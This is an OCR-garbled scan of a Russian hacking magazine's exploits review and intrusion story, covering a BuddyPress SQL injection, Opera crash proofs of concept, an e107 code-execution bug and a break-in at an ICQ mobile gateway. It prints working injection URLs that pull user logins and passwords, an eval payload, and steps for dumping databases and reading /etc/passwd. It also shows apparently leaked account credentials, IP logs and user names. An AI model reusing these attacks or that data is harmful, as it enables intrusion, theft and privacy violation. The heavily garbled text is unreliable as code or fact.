0ѵаСРз*а2бІіЫл(ІІѵ228иапМпРдыѵс2МуаХВ0Р§0КРС9іЬ2К5Р§0К 
- -_Ьоипбагу_Ьу_теге- - 

*/ 

б. Переименовываем сЛѵѵогб.хтІ в сЛѵѵогб.бос. 
е. Открываем сЛѵѵогб.бос и наслаждаемся результатом. 

Учти, что для использования атаки ты должен знать путь кѵѵогб- 
файлу. 

6. Сгозз 2опе Зсгірііпд 

А теперь перейдем к последнему и самому опасному способу экс- 



РЕ9С5кѴОѴСВОТЕРТи01ЕРиММІІ01ЕОзЕуМ2(21І\Ібс4І_ТЕуМ2(21:ШМуМ5 

0хМдМ01ТЕхМТЕхМТЕхМТЕхМ5ВОТ0КРдкРТКТ1дОі93а1лІ5кЬЗб2ІЗМ5 

сЗВ1ЬТМу12МІіЬСМи2ХІі1РдыѵТ03ККиМІІР§== 

- -_Ьоипбагу_Ьу_теге- - 

*/ 

После старта полученного файла должен запуститься саІс.ехе. 
Подробное абѵізогу от авторов на английском языке ищи по адресу 

Ьир://доо.д[/а29Ау . 

іиаши 

МісгозоП ѴѴіпсІоѵѵг ХР/2003/ѴІ5іа/2008/7 



50ШТІ0Ы 



В качестве временного решения данной проблемы мелкомягкие 
рекомендуютзаблокировать тЫтІ- прото кол. Это можно осуществить 
одним из следующих способов: 

1. Скачать и запустить приложение «Еіх іі», доступное по адресу 

зиррогСтісгозоіі.сот/кЬ/2501 696 . 
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іапчп ірівсгор здегв^і№4№К осавесш.1 

ЗОЬинъекция в ВисІсІуРгезз 



2 . Изменить соответствующие записи в системном реестре 
ѴѴі псіохл/5 (подробнее тут: 5еси гіііѵіа Ь. ги/ѵи Іпе га Ьі ііііѵ/404604. р Ь р ) . 

ВІЮРѴРКЕ55 >=1.2 АСТІѴІТѴ ОЕТ 
5РЕСІРІС0 501. ІКІЕСТЮМ ЕХРЮІГ 

ЕШЗ 

ВисІсІуРгезз — это популярнейший плагин для известного движка 
ѴѴогсІРгезз, позволяющий построить готовую социальную сеть «из 
коробки». О популярности данного скрипта можно судить хотя бы по 
тому, что боодіе выдает 71 6 000 результатов по специфичному для 
ВисІсІуРгезз зап росу «іпи К: ітіетЬегз/абппіп/асііѵіІу». Примерно пол- 
тора года назад я нашел презабавнейшую 5С!І_-инъекцию в данном 
плагине, которую не закрыли и по сей день (на момент написания 
статьи — ВисІсІуРгезз 1 .2.7). Чтобы понять механизм возникновения 
этой уязвимости, давай проведем небольшой реверси н г рбр- кода. 

1. Смотрим на файл шаблона групп ./ѵѵр-сопІепі/рІидіпз/Ьиббургезз/ 
Ьр-Ібетез/Ьр-іМаии/д гоирз/зіпдіе/боте.рбр: 

< РрИр еівеі ( Ьр_§гоир_І5_ѵІ5ІЬ1е() && 

Ьр_І5_ас1:іѵе( 'асЫуИгу' ) ) : ?> 

< ? рМр 1оса1:е_1:етр1а1:е( 

аггау( , §гоир5/5Іп§1е/ас1:іѵі1:у.рбр , ), 1:гие ) ?> 

2 . Находим упомянутый выше шаблон «асбѵііу» в ./ѵѵр-сопіепі;/ 
рІидіпз/ЬисІсІургезз/Ьр-ІіЬетез/Ьр-сІебаи и/д гоирз/зіпдіе/асбѵііу.рбр: 

ксііѵ с1а55="ас1:іѵі1:у 5Іп§1е-§гоир"> 

< ? рМр 1оса1:е_1:етр1а1:е( 

аггау( ' ас1:іѵі1:у/ас1:іѵі1:у-1оор. рбр ' ), 1:гие ) ?> 
с/сііѵх ! -- 
. ас1:іѵі1:у --> 




Эксплойт для ВисІсІуРгезз 



3. Смотрим на на файл «./ѵѵр-сопІепі/рІидіпз/Ьиббургезз/Ьр-Ібеппез/ 
Ьр-беі'аии/асііѵііу/асііѵііу-іоор.рбр» из верхнего кода: « < ? р Ь р ( 
Ьр_ба5_асІіѵіІіез( Ьр_а)ах_диегуз1хіпд( 'асбѵііу' ) ) ) : ?>;» 

4 . Находим эту функцию в файле ./ѵѵр-сопіепі/ріидіпз/биббургезз/ 
Ьр-асбѵіІу/Ьр-асбѵіІу-ІетрІаІеІадз.рбр: 

-Рипсіііоп Ьр_ба5_ас1:іѵі1:іе5( $аг§5 = ' ' ) { 

$г = мр_раг5е_аг§5( $аг§5., $сІе-Раи11:5 ); 
ех1:гас1:( $г ); 

сазе '-РаѵопіІіеБ ' : 

$-Раѵз = Ьр_ас1:іѵі1:у_§е1:_и5ег_-Раѵогі1:е5( $изег_ісІ ); 

( етр1:у( $-Раѵз ) ) 
ге1:игп -Раізе; 

$іпс1исІе = ітр1осІе( ' , ' , (аггау)$-Раѵ5 ); 

Ьгеак; 

$ас1:іѵі1:іе5_1:етр1а1:е = пеы ВР_Ас1:іѵі1:у_Тетр1а1:е ( $ра§е. 
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Лог падения Оперы 



5. В том же файле ./ѵѵр-сопРепР/рІидіп5/ЬисІсІурге55/Ьр-асРіѵіРу/ 
Ьр-асІіѵіІу-ІетрІаІеІадз.рЬр находим функцию Ьр_асРіѵіРу_РетрІаРе(): 

ТипсРіоп Ьр_ас'Ріѵі'Ру_'Ретр1а'Ре( $ра§е і $рег_ра§е і 
$тах, $іпс1исІе, $зогР, $^і11:ег., $зеагсІп_1:епті5, 
$сІІ5р1ау_соттеп1:5 і $5Ііоы_ІіісІсІеп ) 

{ 

/* Сеі: ап аггау оТ 1:Ме 1о§§еб іп изег-’з Таѵогі-Ре асРіѵі-ріез */ 
$1:ІіІ5->ту_-Раѵ5 = тауЬе_ипзегіа1І2е( 

§е1:_и5егте1:а( $Р>р->1о§§есІіп_и5ег->ісІ., 

' Ьр_-Раѵогі1:е_ас1:іѵі1:іе5 ' ) ); 
і-р ( !етр-ру( $іпс1исІе ) ) { 

/* Реіісіі зресіРіс асРіѵгРу і-ретз ЬазесІ оп Ю-’з */ 
$1:ІіІ5->ас1:іѵі1:іе5 = Ьр_ас1:іѵі1:у_§е1:_5ресіРіс( аггау( 

' асРіѵі1:у_ісІ5 ' => ехр1осІе( ' / , $іпс1исІе )., 

'тах' => $тах., 

' ра§е ' => $*Ніз->ра§_ра§е, 

'реп_ра§е' = > $-рІіІ5->ра§_пит,, 

' зог-р ' => $зогР., 

1 сІІ5р1ау_соттеп1:5 ' => $сІІ5р1ау_соттеп1:5 ) ); 

} 

6. Далее следуем в файл ./ѵѵр-сопІепі/рІидіпБ/ЬиббургезБ/Ьр-асІіѵіІу. 
рЬр и находим функцию Ьр_асРмРу_деР_5реабс(): 

ТипсРіоп Ьр_ас1:іѵі1:у_§е1;_5ресіРіс( $аг§з = ' ' ) { 

$г = ыр_рагзе_аг§з( $аг§5„ $сІе-Раи1-рз ); 
ех1:гас1:( $г, ЕХТК_5КІР ); 

геТигп арр1у_Рі11:ег5( 1 Ьр_ас1:іѵі1:у_§е1:_5ресіРіс ' , 
ВР_Ас'Ріѵі'Ру_Ас'Ріѵі'Ру : : §е-р_зресИйс ( 

$асРіѵі1:у_ісІ5., $тах., $ра§е і $рег_ра§е., 

$зог1:., $сІІ5р1ау_соттеп1:5 ) ); 

} 

7. И, наконец, наша главная цель — функция деР_ 5 реабс() в файле ./ 
ѵѵр-сопІепі/рІидіпБ/ЬисІсІургеББ/Ьр-асІіѵіІу/Ьр-асІіѵіІу-сІаББеБ.рЬр: 

ТипсРіоп §е1:_5ресіРіс( $асРіѵі1:у_ісІ5., $тах = Таізе., 

$ра§е = 1, $рег_ра§е = 25., $зогР = '0Е5СД 
$сІІ5р1ау_соттеп1:5 = -Раізе ) 



{ 

§1оЬа1 $ырсІЬ і $Ьр; 

і- ( із_аггау( $асРіѵі1:у_ісІ5 ) ) 

$асРіѵі1:у_ісІ5 = ітр1осІе( , $асРіѵі1:у_ісІ5 ); 
$асРіѵі1:у_ісІ5 = $ырсІЬ->е5саре( $асРіѵі1:у_ісІ5 ); 

$асРіѵі1:іе5 = $ырсІЬ->§е1:_ге5и11:5( $ырсІЬ->ргераге ( 

"5ЕІ_ЕСТ * РКОМ {$Ьр->ас1:іѵі1:у->-раЬ1е_пате} ІлІНЕКЕ ісі ІЫ 
({$асРіѵгРу_ісІ5}) (Ж>ЕК ВУ сІа1:е_гесогсІесІ {$зогР} $ра§_зд1" 
)); 

} 

Как видишь, хоть кавычки в переменной $асбѵі1:у_ісІ5 и обрамля- 
ются обратными слэшами с помощью функции езсареО, нам это 
нисколько не мешает! В уязвимом БЦІ-запросе наша переменная 
изначально не обрамлена кавычками іб ІЫ ({$ас1;іѵИ;у_ісІ5}) — таким 
образом, мы легко сможем выполнить атаку класса зді-іщесііоп. 

МіІЫп 

Схема эксплуатации описанной уязвимости достаточнотривиальна: 

1. Регистрируемся в социальной сети. 

2. Создаем группу. 

3. Проводим Бці-инъекциіо. 

Іі1:1:р://1атег/ыр30/§поир5/1:е5І:/ас1:іѵі1:у/-9)ипіоп(5е1е 
сР(1),(2),(3), (4 ) у (Б)^сопса1:(и5ег_1о§1п^0хЗа л и5ег_ 
разз) , (7),(8),(9),(10),(11),(12), (13)-Ргот(іл/р_изег5) 
іл/беге(іб=1) 

Также существуют и другие векторы использования этой баги — 
например, Ыіпб-вариант без создания группы: 

Іі-р-рр : //1атег/мр30/ас-ріѵі1:у/Таѵогі-ре/ -9) ог ( 1= ( зеіесі: ( 1 ) 
■Ргот(ыр_изегз)ыІіеге(и5ег_1о§іп=сбаг(97^ 100., 109., 105., 1 
10))) 

Удобный готовый эксплойт ты сможешь найти по адресу ЬРРр://доо. 
д[/рбк8г . 

ВиббуРгезз >= 1.2 и <= 1 . 2.7 
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Для закрытия уязвимости открой файл ./ѵѵр-сопіепі/ріидіпз/ 
Ьиббургезз/Ьр-асІіѵіІу/Ьр-асбѵіІу-сІаззез.рЬр и замени код: 

і- ( із_аггау( $ас1:іѵі1:у_ісІ5 ) ) 

$ас1:іѵі1:у_ісІ5 = ітр1осІе( ' , ' , $ас1:іѵі1:у_ісІ5 ); 

$ас1:іѵі1:у_ісІ5 = $ырсІЬ->е5саре( $ас1:іѵі1:у_ісІ5 ); 

Заменить приведенный выше код нужно на следующий: 

$ас1:іѵі1:у_ісІ5 = $мрсІЬ->е5саре($ас1:іѵі1:у_ісІ5) ; 
і-р ( І5_аггау( $ас1:іѵі1:у_ісІ5 ) ) 

$ас1:іѵі1:у_ісІ5 = ітр1осІе( " $ас1:іѵі1:у_ісІ5) ; 

И строку «ісі ІЫ ({$асІіѵіІу_ісІ5})» на строку «ісі ІЫ ('{фас^м^^з}')». 

МНОЖЕСТВЕННЫЕ УЯЗВИМОСТИ 
ВОРЕРА 

В январе текущего годаЖорди Шансель и Макото Шиотзуки обнару- 
жили целую кипууязвимостей в моем любимом браузере. Найденные 
дыры позволяютудаленному пользователю обойти некоторые ограни- 
чения безопасности, получить доступ к важным данным и скомпроме- 
тировать целевую систему. 

1. Целочисленное переполнение при обработке большого количества 
вложенных элементов в Ыті-теге «зеіесі» позволяет вызвать пере- 
полнение динамической памяти и выполнить произвольный код на 
целевой системе (в опубликованных РоС представлены только йоЗ- 
варианты этого бага). 



2. Уязвимость в ссылках с префиксом «орега:». Злоумышленник 
может обманом заставить пользователя нажать на специально 
сформированную ссылку и изменить некоторые настройки браузера. 

3. Уязвимость, возникающая при обработке определенных ЫТр- 
ответов и перенаправлений. Злоумышленник может загрузить про- 
извольные локальные файлы в качестве ѵѵеЬ- контента и получить 
доступ к содержащейся в них информации. 

4. Уязвимость, заключающаяся в запуске браузером некорректного 
исполняемого файла при попытке открыть каталог, содержащий 
какой-либо загруженный файл (эксплуатация уязвимости требует 
неплохих навыков в области социальной инженерии). 

5. Уязвимость, кроющаяся в опции «Сіеаг аіі етаіі ассоипі 
раззѵѵогсіз» утилиты «йеіеіе Ргіѵаіе Оаіа», которая не очищает етаіі- 
пароли до перезапуска приложения. Теоретически злоумышленник 
может получить доступ к учетным записям почты пользователя. 

М:ІШі 

Таккакбагиза номерами 2-4требуютиспользования социальной 
инженерии, способы их эксплуатации крайне туманны и неоднознач- 
ны. Нодля первого бага уже опубликованы вполне определенные 
концепт-коды выполнения йоЗ-атаки (способы запуска произвольно- 
го экзешника, конечноже, держатся втайне). 

Первый РоС написан на РНР: 

кзеіесі: пате="сІ05 ,, > 

<?Тог($і=Ѳ;$і<32768;$і++) : ?> 

<ор1:іоп><?=$і?></ор1:іоп> 

<?епсІ-Роп; ?> 

</5е1ес1:> 

После выполнения данного скрипта с помощью Оперы твой брау- 
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ЕХРЮІТЗ 

РП/ІПМ 










ЕХРЮІТЗ 

РЕѴІЕѴѴ 






зер намертво повесит всю систему. Второй РоС написан на Регі и 
немного отличается от первого: 

І = 0 

Ьи-Р = " < орі іоп > АААААААААААААААААААААААААААААААААААААААААААА 
ААААААААААААА< /орііоп>\п" 

іл/Ьі1е І<0х4141 

Ьи-Р += " < о рі і о п > ААААААААААААААААААААААААААААААААААААААА 
АААААААААААААААААА< /оріііоп >\п " 
і+=1 
епсі 

НТШ = 

"<Ы:т1>\п ,, + 

"<ЬосІу>\п\п ,, + 

"кзеІесіЛпХп" 

НТШ+=Ьи-Р * 100 

НТМІ_ += "\п\п\п\</5е1ес-р>\п\п"+ 

"</ЬосІу>\п\п\п" + 

"к/ЬітІЛпХпХпХпХп" 

-р = РіІе.ореп^'ЕхрІоі^орега^І.ѲѲ.Ь-ртГѴѴ' ) 

-р . риііз НТМІ_ 

-Р.СІ05Ѳ 

На выходе ты снова получишь фатальный для Орега Ыті-код. 

ЦЩЙЗЁ 

Орега 1 0.63, 1 1 .0 и более ранние версии. 



50ШТІ0М 



Для устранения всех этих уязвимостей тебе необходимо всеголишь 
обновиться до последней версии браузера с официального сайта 
орега. сопл. 

Е107 <= 0.7.24 ВЕМОТЕ РНР СОРЕ 
ЕХЕСШІОЫ 

Как-то раз я наткнулся на интересный анализ годовалой давности 
одной из уязвимостей в известнейшем РНР движке еі 07 ( ЬирУ/доо. 
дІ/1_ѴѴЕ1 9 ). В этом анализе хакер под ником 0x6а 61 606573 обнару- 
жил интересный ченджлог в исходниках файла ./с1а552.рбр: 

геѵізіоп 1.388, 5аі Зап 9 20:32:21 2010 ІІТС 
сІе6пе( "е_(21ІЕКУ", $е_(21ІЕКУ); 

геѵізіоп 1.390, Ргі Зап 22 15:00:22 2010 ІІТС 
ОебпеС'еД^ЕКУ"., з1:г_гер1асе(аггау( ' { ' , 

' %7В 1 , '%7Ь', ' %7й ' , ' %7сІ 1 ) , ' ' , $е_(21ІЕКУ)); 

Тут же этот хакер нашел и повод, повлекший за собой такие изме- 
нения. Интересный код содержался в файле Іодіп.рбр: 

$іехі = рге§_гер1асе("/\{( .*?)\}/е", ' ѵагзеі($\1, "\1") ' , 

$І_ОСІІ\І_ТАВІ_Е); 

Данный ргед_гер1асе() с модификатором «е» позволял выполнять 
произвольный код на системе с помощью специально сформи- 
рованного ІІРІ_ вида ЫірУ/ѵѵѵѵѵѵ.ехаппрІе.сопп/еІ 07/Іодіп.рНр/ 
{х.рбріпЬЩ . Несмотря на то, что этот баг закрыли уже более года 
назад, я заинтересовался самим механизмом выполнения кода и 
нашел следующие забавные вещи в последней на момент написа- 
ния обзора версии е 1 07 0.7.24: 





ЕХРЮІТЗ 




КЕѴІЕѴѴ 



I I 

1. Открываем файл ./зеагсЬ.рбр и смотрим примерно на 400 линию: 

$Техі = рге§_гер1асе("/\{( . *?)\}/е", '$\1', 
$5ЕАКСН_ТОР_ТАВІ_Е); 

2. Теперь находим саму переменную $5ЕАРСН_Т0Р_ТАВІ_Е в файле 
./еі 07_іЬеі7іе5ЛеітщІаІе5/5еагсЬ_Іеі7ірІаІе.рбр: 

і- (!І55еі($БЕАКСН_Т0Р_ТАВІ_Е)) { 

$5ЕАКСН_ТОР_ТАВІ_Е = 

"ксііѵ зіу1е= 'іехі-аіі^п : сепіег ' > 

<-Рогт ісІ= ' зеагсЬ-Рогт ' пате= ' зеагсЬ-Рогт ' теіЬосІ= ' §еі ' 
асііоп= ' " . е_5ЕІ_Р . " ' > 

сіаЬІе з1:у1е= ' " .ІІБЕРМлІЮТН. " ' с1азз= '-РЬогсІег ' ><іг> 

сісі с1а55='-РогитЬеасІегЗ ' зіу1е= 'місІіЬ : 40%' >" . І_АІ\І_199. " 

</1:сІ> 

<ісІ с1азз= , -РопитЬеасІегЗ ' 

зіу1е= ’іл/ісііЬ : 60%; ыЬііе-зрасе : поыгар'> 

{5ЕАКСНДМА11\1_5ЕАКСНР1Е1_Р}&пЬзр; 

{5ЕАКСН_МАІМ_51ІВМІТ}&пЬзр; {ЕМНАМСЕО_ІСОЫ} 

</ІСІ> 

</іг>"; 

} 

Здесь константа е_5ЕЕЕ берется из переменной $_8ЕРѴЕР[‘РНР_ 
5ЕЕЕ’], которая парсится в классе ,/с1а552.рбр: 

і- ( ($роз = з1:гро5($_5ЕКѴЕК[ ' РНР_5ЕІ_Р ' ] , " .рЬр/")) !==-Ра1зе) 
// гесіігесі: ЬасІ ІЖІ_з іо іЬе соггесі опе. 

{ 

$пеы_иг1 = зиЬзіг ($_5ЕКѴЕК[ ' РНР_5ЕІ_Р ' ] , 0, $роз+4); 
$пеы_1ос = ($_5ЕКѴЕК[ , диЕКУ_5ТКІМС']) ? 

$пеы_иг1 . " . $_5ЕКѴЕК[ ' (211ЕКУ_5ТВ11\1С ' ] : $пеы_иг1; 
ЬеасІегО'ІосаІііоп: " . $пем_1ос) ; 
ехіі() ; 

} 

$_5ЕКѴЕК[ ' РНР_5ЕІ_Р ' ] = ( 

($роз = зігроз ($_5ЕКѴЕК[ 1 РНР_5ЕІ_Р ' ] , " .рЬр")) !==Та1зе 
? зиЬзіг ($_5ЕКѴЕК[ ' РНР_5ЕІ_Р ' ] , 0, $роз+4) 

: $_5ЕКѴЕК[ ' РНР_5ЕІ_Р ' ] ) ; 

Мой эксплойт очень похож на сплойтОхбабІ 606573 и, как и ори- 
гинал, срабатываеттолько на серверах, нечувствительных к 
регистру (обычно винда): Ыір ://1а тег/е 1 07-0.7.24/зеагсб.рНр/ 
{а=еѵаКрЬ ріпіоО)} . 

еі 07 <= 0.7.24 



ЮШТІОЫІ 



Для устранения проблемы воспользуемся способом самих авторов 
движка и сделаем в файле ,/с1а552.рбр небольшое изменение: 
Найдем код: 

сІе6пе("е_5ЕІ_Р ", ($ргеТ[ ' зз1_епаЫесІ ' ] == '1' ? 

"Ьіірз : //" . $_5ЕКѴЕК[ ' НТТР_Н05Т ' ] : 

"Ьіір://" . $_5ЕКѴЕК[ 'НТТР_Н05Т' ]) . 

($_5ЕКѴЕК[ ' РНР_5ЕІ_Р ' ] ? $_5ЕКѴЕК[ ' РНР_5ЕІ_Р ' ] : 
$_5ЕКѴЕК[ ' 5СКІРТ_РІІ_ЕІ\ІАМЕ ' ] ) ) ; 

И вставим перед ним следующее: 

$_5ЕКѴЕК['РНР_5ЕІ_Р'] = зіг_гер1асе( гау('{', 

'%7В 1 , '%7Ь ' , ' %70 ' , ' %7сІ ' ) , ' $_5ЕКѴЕК[ ' РНР_5ЕЬР ' ] ) ); ПЕ 
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Эпический взлом знаменитого ІСО-шлюза 



• По традиции, примерно раз в два года ты можешь насладиться истори- 
ей взлома мобильного шлюза ^аі.сот, предназначенного для общения в 
ІС0/6ТаІк/РасеЬоок/ВКонтакте/... с телефона. Каждый из взломов отли- 
чался увеличением сложности и глубины проникновения в систему. В 
этом материале мы постараемся поставить жирную точку в этой истории, 
потому что получать контроль больше просто не над чем - пали послед- 

Во-вторых, сохранился не только веб-шелл, но и суидник гарІог_ 
ргсШ, полученный с помощью сплойта І_іпих Кегпеі 2.6.13 <= 
2.6.17.4 ргсЩ) Ьэсаі Рооі Ехріоіі. 

В-третьих, вкуснейшие логи сервиса, в которых когда-то храни- 
лись пароли и ІСО-уины, по-прежнему находились в /изг/іосаі/ 
арасЬе_1 .3.37/1одз/. Насторожило то, что эти самые логи имели 
крайне малый размер и уже не содержали ничего интересного. 
Чтобы подтвердить закравшиеся сомнения, я проследовал на 
известный сервис Реѵегзе ІР І_оокир, расположенный по адресу 
ѵоидеІзідпаІ.сотЛооІз/ѵѵеЬ-зіІез-оп-ѵѵеЬ-зегѵе , и узнал, что теперь 
сервер (огитз.ііаі.сот обслуживает только следующие сайты: 



ние из серверов этого ШР-сервиса. 
Предыстория 

Как-то раз мне в голову взбрело перебрать старые текстовые файлы 
с логами взломов ^аі.сопп. Как это ни удивительно, но мой старый 
шелл все еще находился в укромном месте по адресу Ьгитз.^аі. 
сот/рбрВВ2Дапдиаде/[апд икгаіпіап/1 ,рЬ ! 

Конечно же, я сразу вспомнил былое и стал исследовать систему. 
Во-первых, старинное ядро так никто и не удосужился пропатчить: 

ЗузСет: Ьігшх аС-згѵ-таіп 2 . 6 . 15-1 . 2 054_РС5зтр #1 ЗМР 
Тие Маг 14 16:05:46 ЕЗТ 2006 І686 



► 048 



ХАКЕР 04 /147/ 201 1 






Мой старый шелл на {огит$.1|а1сот 



• -Рогит5.1=за1:.сот; 

• 1:етр.1:да1:.сопі; 

• Іідаѣ.сот (редирект на тіаті . сот) ; 

• ммл/.1:да1:.сот. 

Такое положение вещей меня, конечно же, не устраива- 
ло, поэтому настала пора заняться взломом последних 
рубежей обороны ^аТсот :). 




Проникновение в БД 

После не слишком долгих поисков стало ясно, что адми- 
ны шлюза практически полностью перенесли свое тво- 
рение на )аѵа и, соответственно, Арасбе ТоппсаТ 
Из интересного на глаза мне попался файл /изг/іосаі/ 
Іоітісаі/сопіѴСаІаІіпа/ІосаІЬозі/ѵѵарісд.хппІ., в кото- 
ром содержались данные для подключения к некой 
Роз1дге5СН_ базе: 

<Ѵа1ѵе 

с1аБ5І\Іате="ог§.арасІіе. саѣаііпа . ѵаІѵеБ . 

Ассе55І_о§Ѵа1ѵе" 
рге6х="ѵ\/арісд_ассе55_1о§. " 

5и-Р6х=" .ЪсЬ" 
ра1:1:егп= " сотЬіпесІ " 
сопсІі1:іоп= ,, р ,, /> 



Дамп с логами ВКонтакте 



туісі 


| ро5І:§пе5 


| ІІТР8 


ро5І:§ге5 


| ро5І:§ге5 


| І_АТІІ\І1 


Брасе 


| ро5І:§ге5 


| Б(2І__А5СІІ 


5І:а1:І5І:іс5 


| ро5І:§ге5 


| Б(2І__А5СІІ 


Биттапу 


| ро5І:§ге5 


| Б(2І__А5СІІ 


1:етр1а1:е0 


| ро5І:§пе5 


| І_АТІІ\І1 


ѣетріаѣеі 


| ро5І:§пе5 


| І_АТІІ\І1 


ѣдаі: 


| ро5І:§ге5 


| Б(2І__А5СІІ 


1:ыі1:1:ег 


| ро5І:§ге5 


| ІІТР8 


исі 


| ро5І:§ге5 


| ІІТР8 


мараоі 


| ро5І:§ге5 


| Б(2І__А5СІІ 


ыар-РЬ 


| ро5І:§пе5 


| ІІТР8 


ыарісд 


| ро5І:§ге5 


| Б(2І__А5СІІ 


ыардд 


| ро5І:§пе5 


| 5(2І__А5СІІ 


хтрр 


| ро5І:§ге5 


| ІІТР8 


уабоо 


| ро5І:§ге5 


| 5(2І__А5СІІ 



кКезоигсе пате="дсІЬс/ыарісд" 

1 = уре= ,, да\/а х . здІ-Оа^аБоипсе" 
аиІіІі^'СопІіаіпег" 

Тас1:огу= ,, ог§ . арасбе . ѣотсаі: . сІЬср . сІЬср . 

ВаБІсОаІіаБоипсеРасІіогу" 
иг1="дсІЬс : ровѣ^геврі : //10.0. 0. 1 : 5432/марісд" 
сІгіѵегС1а55Мате="оп§. роБѣ^пеБЯІ.Огіѵег" 
иБегпате^'роБ^геБ" 
ра5 5^л^огсI= ,, ро51:§пе5 ,, 

Я составил нехитрую команду для просмотра доступных 
баз данных: 

/ивг/1оса1/Ііурегіс/5егѵег-4.2.0/ІідсІЬ/Ьіп/ 
рвці -б 10.0.0.1 -1 -II ров1:§ге5 -ІдІ 

И увидел следующую картину (кстати, как выяснилось 
немного позже, юзер розідгез вообще не имел пароля!): 

І_І5І: оТ сІаѣаЬаБез 
Мате | Омпег | ЕпсосІіп§ 



аг* 


| ро5І:§ге5 


| І_АТІІ\І1 


саЬБ 


| ро5І:§пе5 


| ІІТР8 


сбікка 


| ро5І:§ге5 


| 5(2І__А5СІІ 


-РасеЬоок 


| ро5І:§пе5 


| ІІТР8 


ГП5П 


| ро5І:§ге5 


| Б(2І__А5СІІ 



После небольших экспериментов и нескольких запросов 
к обнаруженной базе я нашел: 

1. Логи подключений к асе в таблице ѵѵарісд.ісдизег, 
весящие 141 Мб (аналогичным образом назывались и 
таблицы с логами для остальных сервисов): 



• 555628075 2010-11-07 20:05:39 12.150.188.194 
БОПуЕГІС55ОПК610І 

• 333786737 2011-01-29 16:57:25 212.150.188.194 
5опуЕгіс5БОПІлІ595/КЗЕЗ 

• 390588423 2010-12-10 05:08:38 213.87.76.177 
Мо2І11а/5.0 (І_іпих; II; АпсІпоісІ 2.1- ирсіаііеі ; 
ѣг-ѣг; НТС_Ыі1сИпге_АЗЗЗЗ Виіісі/ Е КЕ27 ) 

• 429828391 2010-09-05 20:34:00 213.87.86.70 
Орега/9.80 

2 . Таблицу зІабзбсзТгаЛіс, содержащую логи в формате 
Апача (из-за того, что отныне сервис не передает логин 
и пароль для подключения в _6ЕТ, толка от этих логов 
не было никакого); 

3. Маленькие таблицы туіб.изег_ассоип1;5 и туіб.изегз, 
содержащие непонятные аккаунты и пароли: 

448280389; дипатЗѲ 
467470765; уи1іап2007 
1:з'а1:1:е5І:10@бо1:таі1. сот;1:да1:1;е5І:1 




> ѵѵагпіпд 

Все описанное в ста- 
тье является плодом 
воображения автора. 
Любые совпадения 
с существующими 
сайтами случайны. Ни 
редакция, ни автор не 
несут ответственности 
за любой возможный 
вред, причиненный 
материалами этой 
статьи. 




НТТР://ѴѴѴШ 

■ Г 

> ѵѵѵѵѵѵ 

• Ыпих Кегпеі 2.6.13 
<=2.6.1 7.4 ргсШ) і-осаі 
Вооі ЕхрЫЕ ехріоіі:- 
сИэ.сот/ехрІоіІз/2031 : 

• ОІіЬсабѵізогу: ореп- 
пеі.ги/ореппеѵѵз/а гі. 
зЫт[?пит=28338 ; 

• 3 варианта исполь- 
зования уязвимости 
ОІІЬс: ЬЛрз://гсІоЦогд/ 
Іогит/збоѵѵіЬгеасІ. 
рЬр?і=817 : 

• Пример записи в 
файлы на Заѵа: ]аѵасІЬ. 
сот/ѵѵгііе-іо-біе- 
изіпд-ЬиЛегесІѵѵгіІег . 
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Ч а Г г ^ і г: 



Гч-гіні-г 






взлом 



Улаш«: или* г; а: :- і ^-.ЛіП 3 ъ 15*1 54;-+ г^вгтр л % :-.(Р к* '.'*• а* :&:(* *6 Е1 - - І5.0І *В&[і>с4&г^.сдг.| 

й«г ^ п**тоф ! йгпир- >5 ( і:Ыэ:.н.! , г ? 

РГіц . Г-1 ѣ Ч-ЙІ г ш оііг . (ііцжіій з ОіІіСІт* . І-П П О? 1П 1Л й ' ПСТ 
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Пароль пользователя сііта 



уТе5Т7654; 123456 
008138969; у и1іап7654 
ТдаТяа1;яа1234 



Здесь также стоит указать схему работы с утилитой рд_битр, так 
как РНР, установленный на сервере, не мог по дефолту работать с 
базами РозІдгеЗСН-: 

/и5г/1оса1/бурегіс/5егѵег-4.2.0/бдсІЬ/Ьіп/р§_сІитр 
-б 10.0.0.1 -II розТ^гез -і -ІлІ -1: ісдизег -ѵ --Р /и зг/ 
1оса1/арасбе_1 . 3 . 37/61: сІос5/-Рогит/рбрВВ2/1ап§иа§е/ 
1ап§_икгаіпіап/1. зді зііаііізііісз 

Данным запросом мы можем сдампить таблицу ісдизег из базы 
зіабзбсз в файл /изг/ІосаІ/арасбе_1 .3.37/Ьібос5Логиіті/рбрВВ2/ 
Іапдиаде/1апд_икгаіпіап/1 .зді 

4 . Аналогичные розідгез-базы находились также на других 
серверах в сетке ^аі: 192.168.25.2, 192.168.25.22, 192.168.25.23, 
192.168.25.24, 192.168.25.25, 192.168.25.26 — это я узнал с помощью 
своих старых птар-логов, описанных в предыдущей статье про наш 
многострадальный шлюз. 

Топтание на одном месте 

Потеряв много времени на изучение розідгез-баз, я решил любыми 
путями проникнуть на соседние сервера — на одном из них должен 
был скрываться нужный нам уѵар.^аі.сот . 

Единственным доступным на тот момент способом казалось чтение 
и запись файлов с помощью встроенных в Роз1:дге5СН_ средств. Но 
немного погуглив по теме, я сообразил следующую схему: 

1. Логинимся в постгрес: 

/изг/1оса1/бурегіс/зегѵег-4.2.0/бдсІЬ/Ьіп/р5д1 -6 \ 

10.0.0.1 -У розТ§гез -сі зТаТізТісз 



с. . . і • ьЕс:>- 
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Логи аськи в ТотсаТ 

да_Аи1:ота1:іоп : /Ьіп/Ьазб 
ТдТоРс :х:0:0: : /боте/ТдТоРс : /Ьіп/ІісзИ 
ѵіасі :х: 506: 510: : /боте/ѵіасі : /Ьіп/ІісзИ 
уиііап : х : 507 : 511 : : /боте/уиііап : /Ьіп/1:с5б 
уагоп : х : 508 : 512 : : /боте/уагоп : /Ьіп/1:с5б 
уигіу :х: 509 : 513 : :/боте/уигіу :/Ьіп/1:с5б 
Иопа1:баІ\І:х: 510: 514: : /боте/НопаІібаІМ : /Ьіп/Іісзб 
ОгепС : х : 511 : 515 : : /боте/ОгепС : /Ьіп/1:с5б 

Дальше, конечно же, возникла необходимость чтения других инте- 
ресных файлов с розідгез-серверов ЦаГа, но попытки прочитать 
что-то, кроме /еіс/раззѵѵб, не увенчались успехом. Например, на 
запрос «сору ааааа -Ргош 1 /е1:с/бо5І:5 ';» постгрес ругался сле- 
дующим образом: 



2 . Читаем файлы с помощью следующего сценария: 

зеі: с1іеп1:_епсосІіп§ То ІІТР8; 

СКЕАТЕ ТАВЬЕ ааааа(Ь ТехТ); 
сору ааааа -Рпогп ' /еТс/раззысІ 1 ; 
зеІесТ * Тгот ааааа; 

РВОР ТАВЬЕ ааааа; 

Данный сценарий успешно отработал и отобразил мне содержимое 
